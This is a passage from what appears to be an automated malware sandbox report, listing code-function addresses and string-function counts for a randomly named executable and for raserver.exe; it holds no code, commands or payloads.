          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202D18B618_2_202D18B6
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2023A08018_2_2023A080
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F28E818_2_202F28E8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202548CB18_2_202548CB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2027990618_2_20279906
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024911018_2_20249110
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025711018_2_20257110
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025594B18_2_2025594B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202FD9BE18_2_202FD9BE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025618018_2_20256180
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F19E218_2_202F19E2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E61DF18_2_202E61DF
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025523D18_2_2025523D
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E0A0218_2_202E0A02
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202FE21418_2_202FE214
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20254A5B18_2_20254A5B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202442B018_2_202442B0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F1A9918_2_202F1A99
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F22DD18_2_202F22DD
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20248B0018_2_20248B00
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024FB4018_2_2024FB40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20254B9618_2_20254B96
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2022EBE018_2_2022EBE0
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202563C218_2_202563C2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202DF42B18_2_202DF42B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2023740C18_2_2023740C
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024141018_2_20241410
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025547E18_2_2025547E
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F1C9F18_2_202F1C9F
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F2C9A18_2_202F2C9A
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E349018_2_202E3490
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E44EF18_2_202E44EF
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202EDCC518_2_202EDCC5
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202CC53F18_2_202CC53F
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024153018_2_20241530
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E1D1B18_2_202E1D1B
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F251918_2_202F2519
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20220D4018_2_20220D40
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202CE58A18_2_202CE58A
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202EE58118_2_202EE581
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202D1DE318_2_202D1DE3
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202DFDDB18_2_202DFDDB
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202ED5D218_2_202ED5D2
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2025661118_2_20256611
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20254E6118_2_20254E61
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202ECE6618_2_202ECE66
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_20255E7018_2_20255E70
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024764018_2_20247640
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E3E9618_2_202E3E96
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F26F818_2_202F26F8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F174618_2_202F1746
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202E278218_2_202E2782
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_2024579018_2_20245790
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202F1FCE18_2_202F1FCE
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: 18_2_202267D018_2_202267D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043BF42B19_2_043BF42B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0432141019_2_04321410
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0431740C19_2_0431740C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433547E19_2_0433547E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D1C9F19_2_043D1C9F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D2C9A19_2_043D2C9A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C349019_2_043C3490
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C44EF19_2_043C44EF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043CDCC519_2_043CDCC5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0432153019_2_04321530
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043AC53F19_2_043AC53F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D251919_2_043D2519
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C1D1B19_2_043C1D1B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04300D4019_2_04300D40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043AE58A19_2_043AE58A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043CE58119_2_043CE581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043B1DE319_2_043B1DE3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043BFDDB19_2_043BFDDB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043CD5D219_2_043CD5D2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433661119_2_04336611
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04335E7019_2_04335E70
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04334E6119_2_04334E61
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043CCE6619_2_043CCE66
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0432764019_2_04327640
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C3E9619_2_043C3E96
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D26F819_2_043D26F8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D174619_2_043D1746
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0432579019_2_04325790
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C278219_2_043C2782
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043067D019_2_043067D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D1FCE19_2_043D1FCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433002119_2_04330021
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433E02019_2_0433E020
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433981019_2_04339810
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043CD01619_2_043CD016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433107019_2_04331070
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043B18B619_2_043B18B6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0431A08019_2_0431A080
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D28E819_2_043D28E8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043348CB19_2_043348CB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433711019_2_04337110
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0435990619_2_04359906
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433594B19_2_0433594B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043DD9BE19_2_043DD9BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433618019_2_04336180
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D19E219_2_043D19E2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C61DF19_2_043C61DF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0433523D19_2_0433523D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043DE21419_2_043DE214
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043C0A0219_2_043C0A02
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04334A5B19_2_04334A5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043242B019_2_043242B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D1A9919_2_043D1A99
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043D22DD19_2_043D22DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0432FB4019_2_0432FB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04334B9619_2_04334B96
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0430EBE019_2_0430EBE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_043363C219_2_043363C2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003A78F019_2_003A78F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003A78EE19_2_003A78EE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003B9DF619_2_003B9DF6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_003BADD819_2_003BADD8
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: String function: 2027DDE8 appears 49 times
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: String function: 2022B0E0 appears 176 times
          Source: C:\Program Files (x86)\Dzhld\ntbhcfw6lm.exeCode function: String function: 202B5110 appears 50 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04395110 appears 40 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0430B0E0 appears 176 times
          Source: C:\Windows\SysWOW64\rase